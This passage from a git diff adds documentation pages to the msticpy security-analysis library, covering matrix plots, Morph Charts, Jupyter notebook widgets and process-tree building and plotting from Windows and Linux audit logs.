+Although it is usually more convenient to plot directly from the DataFrame
+accessor function (``df.mp_plot.matrix``), you can also import the
+native function :py:func:`plot_matrix<msticpy.vis.matrix_plot.plot_matrix>`
+and use that.
+
+It has the same syntax as the pandas extension except that you must supply
+the input DataFrame as the first parameter (or as the named parameter
+``data``)
+
+.. code:: python
+
+   from msticpy.vis.matrix_plot import plot_matrix
+
+   plot_matrix(data=net_df, x="SourceIP", y="DestinationIP", title="IP Interaction")
+
+Plotting interactions based on column value
+-------------------------------------------
+
+The default behavior of the matrix plot is simply to count the number of
+rows in which a given pair of X-Y items occur. The circle linking the X and
+Y entities is sized in proportion to this count.
+
+You can also use a *numeric* column in the input DataFrame to control this
+sizing. For network data you might choose *BytesTransmitted* or something
+similar.
+
+In this example, we're using the *TotalAllowedFlows* column.
+
+.. note:: Because there is a very large variance in the values
+   of this column, the small values have been scaled to a very small
+   size. We address this in the next selection
+
+
+.. code:: ipython3
+
+    all_df.mp_plot.matrix(
+        x="L7Protocol",
+        y="AllExtIPs",
+        value_col="TotalAllowedFlows",
+        title="External IP protocol flows",
+        sort="asc",
+    )
+
+.. figure:: _static/Matrix_plot_value_col.png
+    :alt: Plot of interactions between IP address and Layer 7 protocol.
+        The size of each interaction is controlled by the value of
+        the TotalAllowedFlows column.
+
+
+
+Log scaling the value/size column
+---------------------------------
+
+We saw how, in the previous example, the presence of a few large values
+makes many of the interaction points difficult to see.
+We can change this by plotting the log (natural log) of the scalar values
+using the `log_size=True` parameter.
+
+.. code:: ipython3
+
+    all_df.mp_plot.matrix(
+        x="L7Protocol",
+        y="AllExtIPs",
+        value_col="TotalAllowedFlows",
+        title="External IP protocol flows (log of size)",
+        log_size=True,
+        sort="asc",
+    )
+
+.. figure:: _static/Matrix_plot_value_log.png
+    :alt: Plot of interactions between IP address and Layer 7 protocol.
+        The size of each interaction is controlled by the natural log of
+        the TotalAllowedFlows column. The data points for all interactions
+        are much easier to see.
+
+
+
+Size based on number of distinct values
+---------------------------------------
+
+Using the ``dist_count=True`` parameter lets us use non-numeric values
+as the ``value_col``. In this case the display size is based on number
+of distinct values in the ``value_col`` column.
+
+The plot below plots the circle size from the number of
+distinct Layer 7 protocols used between the endpoints.
+
+.. code:: ipython3
+
+    net_df.mp_plot.matrix(
+        x="SourceIP",
+        y="DestinationIP",
+        value_col="L7Protocol",
+        dist_count=True,
+        title="External IP flows (distinct protocols)",
+        sort="asc",
+        max_label_font_size=9,
+    )
+
+.. figure:: _static/Matrix_plot_value_distinct.png
+    :alt: Plot of interactions between IP addresses showing the number
+        of distinct Layer 7 protocol used between the endpoints.
+
+
+Inverting the size to show rare interactions
+--------------------------------------------
+
+Where you want to highlight unusual interactions, you can plot the
+inverse of the ``value_col`` value or ``count`` of interactions using the
+``invert=True`` parameter.
+
+This results in a plot with larger circles for rarer interactions.
+
+.. code:: ipython3
+
+    net_df.mp_plot.matrix(
+        x="SourceIP",
+        y="DestinationIP",
+        value_col="TotalAllowedFlows",
+        title="External IP flows (rare flows == larger)",
+        invert=True,
+        sort="asc",
+    )
+
+.. figure:: _static/Matrix_plot_value_inv.png
+    :alt: Plot of interactions between source and destination IP addresses.
+        The size of each interaction is inversely proportional to the value of
+        the TotalAllowedFlows column. This highlights rare interactions.
+
+
+Showing interactions only
+-------------------------
+
+Where you do not care about any value associated with the interaction
+and only want to see if there has been an interaction, you can use the
+``intersect`` parameter
+
+.. code:: ipython3
+
+    net_df.mp_plot.matrix(
+        x="SourceIP",
+        y="DestinationIP",
+        title="External IP flows (intersection)",
+        intersect=True,
+        sort="asc",
+    )
+
+
+.. figure:: _static/Matrix_plot_value_intersect.png
+    :alt: Plot of interactions between IP address and Layer 7 protocol.
+        Each circle is a fixed size. This visualization is useful for
+        just seeing which items interacted at all.
+
+
diff --git a/docs/source/visualization/MorphCharts.rst b/docs/source/visualization/MorphCharts.rst
new file mode 100644
index 000000000..f2cfc8a75
--- /dev/null
+++ b/docs/source/visualization/MorphCharts.rst
@@ -0,0 +1,73 @@
+Morph Charts
+============
+
+:py:mod:`msticpy.nbtools.morph_charts`
+
+This module formats data and configuration files for use with http://morphcharts.com/.
+In addition it renders http://morphcharts.com/ in an IFrame within the interface to allow
+you to generate and interact with the charts generated by the data and configuration
+files produced. This module is intended to be used in a Notebook environment.
+
+This module uses templated Azure Sentinel KQL queries and templated chart configurations
+included within MSTICpy.
+
+Finding Charts
+--------------
+There are several ways to find what charts and queries are available for you to use.
+list_charts() returns a list of all available charts:
+
+.. code:: ipython3
+
+    from msticpy.nbtools.morph_charts import MorphCharts
+    morph = MorphCharts()
+    morph.list_charts()
+
+You can also use search_charts() to find charts that match a keyword search:
+
+.. code:: ipython3
+
+    morph.search_charts("Azure")
+
+Once you have found a chart you wish to plot you can get further details with
+get_chart_details(chart_name). This will show the description of the plot as
+well as the name of the associated KQL query.
+
+The queries can be found under the data source containers and are prefixed with
+'morph'. These queries are called in the same way other queries are:
+
+.. code:: ipython3
+
+    query_provider.Azure.list_all_signins_geo(start=datetime(2020,4,8), end=datetime(2020,4,10))
+
+Formatting and Rendering
+------------------------
+Once you have found the chart you wish to render and have the associated data you can
+call display() and pass it the data, and chart name:
+
+.. code:: ipython3
+
+    morph.display(data=query_data, chart_name="SigninsChart")
+
+This will format the data and chart configuration file and put them in a direcory named
+'morphchart_package' in the current working directory. It will also return an IFrame
+displaying http://morphcharts.com/. To load the charts within the IFrame click
+"Choose Files" under "Load Package" heading. Select the 'description.json' and
+'query_data.csv' files under the 'morphchart_package' folder to load the customised charts.
+
+Creating New Chart Templates
+----------------------------
+You can create a add new chart templates for use by this module. The best way to do this
+is by creating a customized chart set using http://morphcharts.com/designer.html. Once complete
+save the chart, which will download a filed called 'description.json'. To add this as a template
+by creating a YAML file with the following format:
+
+.. code:: yaml
+
+    Name: <The name of your chart>
+    Description: <A description>
+    Query: <The name of the query associated with your chart>
+    Tags: <A list of keywords scribing the chart>
+    DescriptionFile: <The JSON blob from your description.json file>
+
+Then include the file in the msticpy/data/morph_charts folder and it will be discovered next time you
+intialize an MorphCharts object.
diff --git a/docs/source/visualization/NotebookWidgets.rst b/docs/source/visualization/NotebookWidgets.rst
new file mode 100644
index 000000000..8038e85a7
--- /dev/null
+++ b/docs/source/visualization/NotebookWidgets.rst
@@ -0,0 +1,534 @@
+Notebook Widgets
+================
+
+
+This module contains aggregated widgets built using IPyWidgets. These
+are designed to speed up common operations like selecting date ranges,
+picking items from a list or tracking progress of a long-running event.
+
+
+.. code:: ipython3
+
+    # Imports
+    import sys
+    MIN_REQ_PYTHON = (3,6)
+    if sys.version_info < MIN_REQ_PYTHON:
+        print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
+        print('or later is selected as the active kernel.')
+        sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)
+
+    from IPython.display import display, Markdown
+    import pandas as pd
+    # Import nbtools package
+    from msticpy.nbtools import *
+
+
+QueryTime
+---------
+
+See :py:class:`QueryTime<msticpy.nbtools.nbwidgets.QueryTime>`
+
+This widget is used to specify time boundaries - designed to be used
+with the built-in msticpy queries and custom queries. The ``start`` and
+``end`` times are exposed as datetime properties.
+
+.. note:: QueryTime is a *RegisteredWidget* so will recall the last
+   values entered if re-run with the same starting parameters.
+   (see :ref:`widgets-registered-widgets`)
+
+.. code:: ipython3
+
+    q_times = nbwidgets.QueryTime(units='day', max_before=20, before=5, max_after=1)
+    q_times.display()
+
+
+.. figure:: _static/Widgets1.png
+   :alt: Date and time selector widget showing setting required start and end
+         times.
+
+.. code:: ipython3
+
+    print(q_times.start, '....', q_times.end)
+
+
+.. parsed-literal::
+
+    2019-08-28 23:36:59.410918 .... 2019-09-03 23:36:59.410918
+
+
+Keep multiple query boundaries aligged by having QueryTime instances
+reference the time of the same alert or event, or to each other.
+
+.. code:: ipython3
+
+    from datetime import datetime, timedelta
+    class MyAlert:
+        pass
+    alert = MyAlert()
+    alert.TimeGenerated = datetime.utcnow() - timedelta(15)
+    alert.TimeGenerated
+
+    q_times1 = nbwidgets.QueryTime(units='hour', max_before=20, before=1, max_after=1,
+                                 origin_time=alert.TimeGenerated, auto_display=True)
+
+    q_times2 = nbwidgets.QueryTime(units='hour', max_before=20, before=4, max_after=2,
+                                 origin_time=alert.TimeGenerated, auto_display=True)
+
+    ...
+    # Note this is a one-time assignment, the values are not linked.
+    q_times2.origin_time = q_times1.origin_time
+
+
+Use the QueryTime properties in a query.
+
+.. note:: You can use a QueryTime instance as a parameter to a *msticpy* query.
+    The query provider will the ``start`` and ``end``
+    properties from the widget and supply these values as the corresponding
+    ``start`` and ``end`` query parameters.
+    See :doc:`../data_acquisition/DataProviders`
+
+
+.. code:: ipython3
+
+    # Use in a query
+    my_kql = f'''
+    SecurityAlert
+    | where TimeGenerated >= datetime({q_times1.start})
+    | where TimeGenerated <= datetime({q_times1.end})'''
+    print(my_kql)
+
+
+.. parsed-literal::
+
+
+    SecurityAlert
+    | where TimeGenerated >= datetime(2019-09-02 22:37:03.860216)
+    | where TimeGenerated <= datetime(2019-09-03 00:37:03.860216)
+
+
+Lookback
+--------
+
+See :py:class:`Lookback<msticpy.nbtools.nbwidgets.Lookback>`
+
+This is simpler version of QueryTime with single slider value
+
+
+.. code:: ipython3
+
+    alert.TimeGenerated = datetime.utcnow() - timedelta(5)
+    lb = nbwidgets.Lookback(origin_time=alert.TimeGenerated, auto_display=True, max_value=48)
+
+
+
+.. figure:: _static/Widgets2.png
+   :alt: Lookback widget showing setting look-back period with slider
+
+
+.. code:: ipython3
+
+    print(lb.start, '....', lb.end)
+
+
+.. parsed-literal::
+
+    2019-08-28 19:37:06.883677 .... 2019-08-28 23:37:06.883677
+
+
+SelectAlert
+-----------
+
+See :py:class:`SelectAlert<msticpy.nbtools.nbwidgets.SelectAlert>`
+
+This lets you view list of alerts and select one for investigation.
+You can optionally provide an action (a Python function) to call
+with the selected alert as a parameter to display or perform some
+other action on the selected item.
+
+
+SelectAlert attributes
+
+*  ``selected_alert``: the selected alert
+*  ``alert_id``: the ID of the selected alert
+*  ``alerts``: the current alert list (DataFrame)
+
+
+Supply a list of alerts with the ``alerts`` parameter.
+The ``columns`` parameter overrides the default column set
+that the widget will display from the alert set.
+
+The ``action`` parameter is a Python callable. When an item
+is selected, this function will be called and passed the
+row (pandas series) of the selected item as a parameter.
+
+
+
+Alert selector with action=DisplayAlert
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+.. code:: ipython3
+
+    alert_select = nbwidgets.SelectAlert(alerts=alerts, action=nbdisplay.display_alert)
+    display(Markdown('### Alert selector with action=DisplayAlert'))
+    alert_select.display()
+
+
+.. figure:: _static/Widgets4.png
+   :alt: Alert selector widget showing browsable list of alerts.
+
+
+SelectItem
+----------
+
+
+See :py:class:`SelectItem<msticpy.nbtools.nbwidgets.SelectItem>`
+
+Similar to AlertSelector but simpler and allows you to use any list or
+dictionary of items.
+
+
+.. code:: ipython3
+
+    if security_alert is None:
+        security_alert = SecurityAlert(alerts.iloc[0])
+    ent_dict = {ent['Type']:ent for ent in security_alert.entities}
+
+    nbwidgets.SelectItem(
+        item_dict=ent_dict,
+        description='Select an item',
+        action=print,
+        auto_display=True
+    );
+
+
+
+.. figure:: _static/Widgets5.png
+   :alt: Using SelectAlert with an optional browser function to show the
+         details of each alert as it is selected from the list.
+
+
+GetText
+-------
+
+See :py:class:`GetEnvironmentKey<msticpy.nbtools.nbwidgets.GetText>`
+
+Get editable string value.
+
+This is a simple wrapper around IPyWidgets Text widget. It is also
+derived from RegisteredWidget so will automatically recall the last
+value entered (for the same starting parameters).
+See :ref:`widgets-registered-widgets`
+
+.. code:: ipython3
+
+    nbwidgets.GetText(prompt='Enter a value', auto_display=True);
+
+
+GetEnvironmentKey
+-----------------
+
+See :py:class:`GetEnvironmentKey<msticpy.nbtools.nbwidgets.GetEnvironmentKey>`
+
+Get editable value of an environment variable.
+
+A common use would be retrieving an API key from
+your environment or allowing you to paste in a value if the environment
+key isn’t set.
+
+This is also a RegisteredWidget so will automatically recall the last
+value entered (for the same starting parameters) unless the named
+``env_var`` environment variable is set. When a valid environment variable
+is found this will always override the "remembered" value.
+See :ref:`widgets-registered-widgets`
+
+.. note:: setting the variable only persists in the python kernel
+    process running at the time. So you can retrieve it later in
+    the notebook but not in other processes.
+
+.. code:: ipython3
+
+    nbwidgets.GetEnvironmentKey(env_var='userprofile', auto_display=True);
+
+
+.. figure:: _static/Widgets6.png
+   :alt: Text widget showing retrieving editable value of an environment
+         variable.
+
+
+SelectSubset
+------------
+
+See :py:class:`SelectSubset<msticpy.nbtools.nbwidgets.SelectSubset>`
+
+Allows you to select one or
+multiple items from a list to populate an output set.
+
+The ``source_items`` parameter can be:
+
+
+*  a simple list
+*  a dictionary(label, value)
+*  a list of (label, value) tuples
+
+In the latter two cases, the ``label`` value is displayed
+but the ``selected_values`` property will return the corresponding
+values.
+
+The ``selected_items`` attribute will always return the label/value
+pairs that have been selected.
+
+You can also pre-populate the Selected items list by supplying values
+for the ``default_selected``.
+
+
+.. code:: ipython3
+
+    # Simple list
+    items = list(alerts["AlertName"].values)
+    sel_sub = nbwidgets.SelectSubset(source_items=items)
+
+
+.. figure:: _static/Widgets7.png
+   :alt: Select Subset widget allowing you to pick a subset of values
+         shown in one list and add them to the list of values
+         that you want to use.
+
+.. code:: ipython3
+
+    # Label/Value pair items with a a subset of pre-selected items
+    items = {v: k for k, v in alerts["AlertName"].to_dict().items()}
+    pre_selected = {v: k for k, v in alerts["AlertName"].to_dict().items() if "commandline" in v}
+    sel_sub = nbwidgets.SelectSubset(source_items=items, default_selected=pre_selected)
+
+
+
+
+.. figure:: _static/Widgets8.png
+   :alt: Select subset widget populated using Python dictionary instead of
+         a simple list.
+
+.. code:: ipython3
+
+    print("Values:", sel_sub.selected_values, "\n")
+    print("Items:", sel_sub.selected_items)
+
+
+.. parsed-literal::
+
+    Values: [79, 109, 83]
+
+    Items: [('Detected suspicious commandline arguments', 79), ('Detected suspicious commandline used to start all executables in a directory', 109), ('Detected suspicious credentials in commandline', 83)]
+
+
+
+Progress Indicator
+------------------
+
+
+See :py:class:`Progress<msticpy.nbtools.nbwidgets.Progress>`
+
+This is thin wrapper around the IPyWidgets ``IntProgess`` control.
+It adds some convenience functions for updating progress and
+controlling visibility.
+
+
+.. code:: ipython3
+
+    from time import sleep
+    progress = nbwidgets.Progress(completed_len=2000)
+    for i in range(0, 2100, 100):
+        progress.update_progress(new_total=i)
+        sleep(0.1)
+
+    inc_progress = nbwidgets.Progress(completed_len=2000)
+    for i in range(0, 2100, 100):
+        inc_progress.update_progress(delta=100)
+        sleep(0.1)
+
+
+.. figure:: _static/Widgets9.png
+   :alt: Progess bar indicators.
+
+
+Multi-Option buttons with async wait
+------------------------------------
+
+This widget is pretty simple on the surface but has some useful features
+for waiting for user input.
+
+.. code:: ipython3
+
+    opt = nbwidgets.OptionButtons(
+        description="Do you really want to do this?",
+        buttons=["Confirm", "Skip", "Cancel"]
+    )
+
+    # Displaying the widget works as expected
+    # and sets `widget.value` to the last chosen button value.
+    opt
+
+.. figure:: _static/Widgets-Multiopt1.png
+   :alt: Multiple option buttons showing Confirm, Skip and Cancel buttons.
+
+
+Using OptionButtons to wait until an option is chosen (or timeout expires)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Option buttons uses an asynchronous event loop to track both the button
+state and the timeout simultaneously.
+
+Because this requires the use of asynchronous code you must do the
+following - call *widget*\ ``.display_async()`` method rather than just
+``display()`` or using the auto-display functionality of Jupyter -
+prefix this call with ``await`` - this tells IPython/Jupyter that you
+are executing asynchronous code and that it needs to wait until this
+call has completed before continuing with cell execution.
+
+.. code:: ipython3
+
+    # Using display_async will run the widget with a visible
+    # timer. As soon as one option is chosen, that remains as the value
+    # of the value of the widget.value property.
+    opt = nbwidgets.OptionButtons(description="Continue?", timeout=10)
+    await opt.display_async()
+
+
+.. figure:: _static/Widgets-Multiopt2.png
+   :alt: Mutiple option buttons shown with timer counting down.
+
+.. warning:: Awaiting the OptionButtons control does not pause the
+   notebook execution. This is a capability that we are still working
+   on.
+
+.. _widgets-registered-widgets:
+
+Registered Widgets
+------------------
+
+Some of the widgets (QueryTimes, GetText) can register themselves and
+retain the setting and values previously entered. This can be useful
+when stepping through a notebook since it is a common mistake to enter
+text in a text box and then execute the same cell again by mistake.
+This, of course, usually results in the widget being reset to its
+default state and erasing the values you just entered.
+
+If you use a registered widget and then create a new copy of the widget
+with identical parameters it will look in the registry for a previous
+copy of itself and auto-populate it’s values with the previous-entered
+ones.
+
+Registered widgets can also read their default values from notebook
+variables - this is mainly useful with notebooks that are
+programmatically supplied with parameters and executed with something
+like Papermill.
+
+Several of the additional parameters available in RegisteredWidgets init
+are for internal use by widgets but three are usable by users:
+
+::
+
+    Parameters
+    ----------
+    nb_params : Optional[Dict[str, str]], optional
+        A dictionary of attribute names and global variables. If the variable
+        exists in the global namespace it will be used to populate the
+        corresponding widget attribute. This is only done if the widget
+        attribute currently has no value (i.e. restoring a value from
+        the registry takes priority over this),
+        by default None
+    ns : Dict[str, Any], optional
+        Namespace to look for global variables, by default None
+    register : bool
+        Do not register the widget or retrieve values from previously-
+        registered instance.
+
+See :py:class:`RegisteredWidget<msticpy.nbtools.nbwidgets.RegisteredWidget>`
+
+.. code:: ipython3
+
+    mem_text = nbwidgets.GetText(prompt="Enter your name")
+
+    # we insert a value here to mimic typing something in the text box
+    mem_text._value = "Ian"
+    mem_text
+
+.. figure:: _static/Widgets-RegWidget1.png
+   :alt: Get Text widget showing that the value in the text box has
+         been restored from its previously-saved value.
+
+
+QueryTime also supports registration
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. figure:: _static/Widgets-RegWidget2.png
+   :alt: Sequence of three notebook cells showing first a QueryTime widget and the
+         default date and time values. Next its values are altered by some
+         code. The third cell shows the widget being re-created and retrieving
+         its default values from the remembered stat set in the previous
+         cell.
+
+Note that the new instance of the widget doesn't use the defaults but
+retrieves its values from the changes we made in the second cell.
+
+
+
+To skip registration add the parameter ``register=False``
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Notice that in the following snippet we are creating an instance of
+the QueryTime widget using the same parameters as earlier but this
+time it ignores any remembered state and reverts to its defaults.
+
+.. figure:: _static/Widgets-RegWidget3.png
+   :alt: QueryTime widget created with register=False, this time it
+         does not populate values from saved state and reverts to its defaults.
+
+Specifying ``register=False`` causes the widget to ignore any remembered
+state and use its defaults. It will also prevent this instance of the
+widget registering itself.
+
+
+Using notebook parameters to populate RegisteredWidgets
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If you use something like Papermill to automate your notebooks, you
+may want to populate default values from notebook parameters. The
+variables holding these parameters may not be set or even declared
+when you create the notebook so you cannot reference them directly
+when you write the code to use the widget.
+
+You can supply a dictionary that specifies which widget attributes to
+populate from variables available in the namespace (the namespace that
+you usually want in notebooks is value retured by the ``globals()``
+function.
+
+The dictionary should be of the form:
+
+.. code:: ipython3
+
+    params_dict = {
+      "widget_attr1", "var_name1",
+      "widget_attr2", "var_name2"
+      ...
+    }
+
+The widget_attr key is the attribute to set in the widget (you may need
+to look at the documentation or code for the widget to work out what the
+name of the attribute is). The "var_name" value is the name of a variable
+that you want to look for when setting the default values of the widget.
+
+You must also specify the namespace for the widget to search for this variable
+name.
+
+.. code:: ipython3
+
+    # This might be defined in a parameter cell at the beginning of the noteboook
+    my_name = "The other Ian"
+
+    my_text = nbwidgets.GetText(prompt="enter your real name", nb_params={"_value": "my_name"}, ns=globals())
+    my_text
+
+.. figure:: _static/Widgets-RegWidget4.png
+   :alt: Get Text widget showing that it can read its default values from notebook
+         parameters.
diff --git a/docs/source/visualization/ProcessTree.rst b/docs/source/visualization/ProcessTree.rst
new file mode 100644
index 000000000..fa2340680
--- /dev/null
+++ b/docs/source/visualization/ProcessTree.rst
@@ -0,0 +1,798 @@
+ProcessTree
+===========
+
+This describes the use of the process tree data and
+visualization modules. These modules can be used with Windows
+process creation events (ID 4688), Linux auditd logs or Microsoft Defender
+for Endpoint (MDE)/Microsoft 365 Defender logs. The
+ProcessTree visualization is built
+using the `Bokeh library <https://bokeh.pydata.org>`__.
+
+See the sample
+`ProcessTree Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/ProcessTree.ipynb>`__
+for full code for the examples shown here.
+
+
+The process tree functionality has two main components:
+
+-  Process Tree creation - this takes a standard log from a single
+   host and builds the parent-child relationships between processes
+   in the data set. There are a set of utility functions to extract
+   individual and partial trees from the processed data set.
+-  Process Tree visualization - this takes the processed output from
+   the previous component and displays the process tree using Bokeh
+   plots.
+
+.. note:: The expected schema for the Linux audit data is as produced
+      by the ``auditdextract.py`` module in ``msticpy``. This module
+      combines related process exec messages into a single combined message
+      that emulates the Windows 4688 event. This retains the audit schema
+      apart from the following additions:
+
+      -  ``cmdline``: this is a concatenation of the ``a0``, ``a1``, etc
+         argument fields
+      -  ``EventType``: this is the audit message type (``SYSCALL``,
+         ``EXECVE``, ``CWD``, etc.) - the combined ``SYSCALL_EXECVE``
+         created by ``auditextract`` is the only type currently supported.
+
+Support for other formats such as Sysmon is planned but not yet included.
+
+Plotting process trees
+----------------------
+
+Plotting process trees from process event data involves two stages:
+
+- Converting the linear event data into an hierarchical tree data
+  structure
+- Plotting the visualization
+
+In most cases you don't need to worry about these two processes - the
+standard :py:func:`plot_process_tree<msticpy.nbtools.process_tree.plot_process_tree>`
+function and the pandas accessor function
+:py:meth:`mp_process_tree.plot<msticpy.nbtools.process_tree.ProcessTreeAccessor.plot>`
+will try to detect if the input data is in the correct format. If it is
+not, the process tree builder is automatically applied to the data.
+
+This should work for Windows events, Linux auditd events and MDE process events.
+
+The easiest way to plot process data as a process tree is to use the pandas
+``mp_process_tree`` accessor.
+
+.. code:: IPython
+
+   from msticpy.nbtools import process_tree
+
+   my_proc_df.mp_process_tree.plot()
+
+.. figure:: _static/process_tree1.png
+   :alt: Process tree plot
+   :width: 5in
+   :height: 5in
+
+Here is the same thing using the ``plot_process_tree`` function.
+
+.. code:: IPython
+
+   from msticpy.nbtools import process_tree as ptree
+
+   ptree.plot_process_tree(procs_df)
+
+For full usage, see the later section `Process tree plotting parameters`_
+
+
+Extracting process trees from logs
+----------------------------------
+
+You can build a process tree without plotting it.
+You might want to do this if you want the intermediate data for
+analysis or if you want to extract a sub-tree for display.
+
+The later section `Process Tree utility functions`_ describes
+some process tree analysis and manipulation functions that you can
+use on the built process trees.
+
+build_process_tree syntax
+^^^^^^^^^^^^^^^^^^^^^^^^^
+See :py:func:`build_process_tree<msticpy.sectools.proc_tree_builder.build_process_tree>`
+
+.. code:: python
+
+   from msticpy.sectools import process_tree as ptree
+   ptree.build_process_tree(procs)
+
+Parameters
+^^^^^^^^^^
+
+procs (pd.DataFrame)
+    Process events (Windows 4688 or Linux Auditd)
+schema (ProcSchema, optional)
+    The column schema to use, by default None
+    If None, then the schema is inferred
+show_summary (bool, optional)
+    Shows summary of the built tree, default is False.
+debug (bool, optional)
+    If True produces extra debugging output,
+    by default False
+
+
+The following example shows importing the require modules and reading in
+test data.
+We then call ``build_process_tree`` to extract the parent-child relationships
+between processes.
+
+
+.. container:: cell code
+
+   .. code:: python
+
+      from IPython.display import display
+      import pandas as pd
+      from msticpy.sectools import process_tree as ptree
+
+      win_procs = pd.read_pickle("../demos/data/win_proc_test.pkl")
+      p_tree_win = ptree.build_process_tree(win_procs, show_summary=True)
+
+
+The tree builder process, tries to infer the schema (you can override this
+with the *schema* parameter) and assembles process parent-child relationships.
+It creates unique keys (the ``proc_key`` column) for each process, based on
+the imagepath + process id + timecreated. It then tries to find the parent
+process in the same dataset or infer the parent from the data in the created
+process event. How it does this differs slightly between input data formats.
+It then adds a ``parent_key`` field to each child record for the parent
+record (found or inferred).
+
+This modified dataframe is returned from ``build_process_tree``. If you
+supply ``show_summary=True`` parameter it will also output some statistics
+about the created tree.
+
+.. container:: output stream stdout
+
+   ::
+
+      {'Processes': 1010, 'RootProcesses': 10, 'LeafProcesses': 815, 'BranchProcesses': 185, 'IsolatedProcesses': 0, 'LargestTreeDepth': 7}
+
+
+The example below shows using two of the process tree utility functions
+to extract the descendants (children, grandchildren, etc) of one of the
+root process rows and then display the subtree.
+
+.. note:: "root" process, in this context means any process whose parent
+   could not be determined. This is not necessarily the actual root
+   process for this tree. A typical data set will have more than one
+   "root" process - this might be better thought of as "earliest discovered
+   ancestor process" but that's a bit of a mouthful.
+
+   "Root" processes are flagged in the data by an ``IsRoot`` column with the
+   value True.
+
+.. code:: ipython
+
+   proc_tree = ptree.get_descendents(p_tree_win, ptree.get_roots(p_tree_win).iloc[2])
+   ptree.plot_process_tree(data=proc_tree, legend_col="SubjectUserName", show_table=True)
+
+
+.. figure:: _static/process_tree1.png
+   :alt: Process tree plot
+   :width: 5in
+   :height: 5in
+
+
+Process Tree Plotting Syntax
+----------------------------
+
+See
+:py:func:`plot_process_tree<msticpy.nbtools.process_tree.plot_process_tree>`
+and
+:py:func:`build_and_show_process_tree<msticpy.nbtools.process_tree.build_and_show_process_tree>`
+
+.. code:: python
+
+   ptree.plot_process_tree(
+       data, schema=None, output_var=None,
+       legend_colNone, show_table=False,
+   )
+
+Process tree plotting parameters
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+data (pd.DataFrame)
+   DataFrame containing one or more Process Trees. This should be the
+   output of ``build_process_tree`` described above.
+
+schema (ProcSchema, optional)
+   The data schema to use for the data set, by default None. If None
+   the schema is inferred. A schema object maps generic field names
+   (e.g. ``process_name``) on to a data-specific name (e.g. ``exe``
+   in the case of Linux audit data). This is usually not required
+   since the function will try to infer the schema from fields in the
+   input DataFrame.
+
+output_var (str, optional)
+   Output variable for selected items in the tree, by default None.
+   Setting this lets you return the keys of any items selected in the
+   bokeh plot. For example, if you supply the string "my_results" and
+   then select one or more processes in the tree, the Python variable
+   ``my_results`` will be populated with a list of keys (index items)
+   of the corresponding rows in the input DataFrame.
+
+legend_col (str, optional)
+   The column used to color the tree items, by default None. If this
+   column is a string, the values will be treated as categorical data
+   and map unique values to different colors and display a legend of
+   the mapping. If this column is a numeric or datetime value, the
+   values will be treated as continuous and a color gradient bar will
+   be displayed indicating the mapping of values on to the color
+   gradient.
+
+show_table (bool)
+   Set to True to show the data table, by default False. Shows the
+   source values as a data table beneath the process tree.
+
+height (int, optional)
+   The height of the plot figure
+   (the default is 700)
+
+width (int, optional)
+   The width of the plot figure (the default is 900)
+
+title (str, optional)
+   Title to display (the default is None)
+
+hide_legend (bool, optional)
+   Hide the legend box, even if legend_col is specified.
+
+pid_fmt (str, optional)
+   Display Process ID as 'dec' (decimal) or 'hex' (hexadecimal),
+   default is 'hex'.
+
+
+.. warning:: **Large data sets** (more than a few hundred processses)
+
+   These will normally be handled well by the Bokeh plot (up to multiple
+   tens of thousands or more) but it will make navigation of the tree
+   more difficult. In particular, the range tool (on the right of the main
+   plot) will be difficult to manipulate. Split the input data into
+   smaller chunks before plotting.
+
+.. note:: **Range Tool and Font Size**
+   Avoid using Range tool to change the size of the displayed plot.
+   The font size does not scale based on how much data is shown. If you
+   use the range tool to select too large a subset of the data in the
+   main plot, the font will become unreadable. If this happens, use the
+   ``reset`` tool to set the plot back to its defaults. Dragging the
+   range box along the tree, rather than dragging individual edges
+   (resulting in resizing the range) will give more readable results.
+
+
+Linux Process Tree
+------------------
+The process for visualizing Linux process trees is almost identical to
+visualizing Windows processes.
+
+.. note:: This assumes that the Linux audit log has been read from a
+   file using
+   :py:func:`read_from_file<msticpy.sectools.auditdextract.read_from_file>`
+   or read from Azure Sentinel/Log Analytics using the
+   LinuxAudit.auditd_all query and processed using
+   :py:func:`extract_events_to_df<msticpy.sectools.auditdextract.extract_events_to_df>`
+   function. Using either of these, the audit messages events related to a single
+   process start are merged into a single row.
+
+   See :doc: `../data_acquisition/CollectingLinuxAuditLogs.rst` for more details.
+
+   Also, see the section `Adapting the input schema of your data`_ for details
+   about using different input schemas.
+
+
+.. container:: cell code
+
+   .. code:: python
+
+      # Process Linux audit events. Show verbose output.
+
+      p_tree_lx = ptree.build_process_tree(linux_proc, show_progress=True, debug=True)
+
+   .. container:: output stream stdout
+
+      ::
+
+         Original # procs 34345
+         Merged # procs 34345
+         Merged # procs - dropna 11868
+         Unique merged_procs index in merge 34345
+         These two should add up to top line
+         Rows with dups 0
+         Rows with no dups 34345
+         0 + 34345 = 34345
+         original: 34345 inferred_parents 849 combined 35194
+         has parent time 20177
+         effectivelogonId in subjectlogonId 35190
+         parent_proc_lc in procs 34345
+         ProcessId in ParentProcessId 21431
+         Parent_key in proc_key 34345
+         Parent_key not in proc_key 845
+         Parent_key is NA 845
+         {'Processes': 35190, 'RootProcesses': 845, 'LeafProcesses': 17664, 'BranchProcesses': 16681, 'IsolatedProcesses': 0, 'LargestTreeDepth': 10}
+
+.. container:: cell code
+
+   .. code:: python
+
+      # Take one of the roots from the process set and get the full tree beneath it
+      t_root = ptree.get_roots(p_tree_lx).iloc[7]
+      full_tree = ptree.get_descendents(p_tree_lx, t_root)
+      print("Full tree size:", len(full_tree))
+
+   .. container:: output stream stdout
+
+      ::
+
+         Full tree size: 3032
+
+
+.. container:: cell code
+
+   .. code:: python
+
+      ptree.plot_process_tree(data=full_tree[:1000], legend_col="cwd")
+
+.. figure:: _static/process_tree2.png
+   :alt: Process tree plot
+   :width: 5in
+   :height: 3in
+
+
+Plotting Using a color gradient
+-------------------------------
+
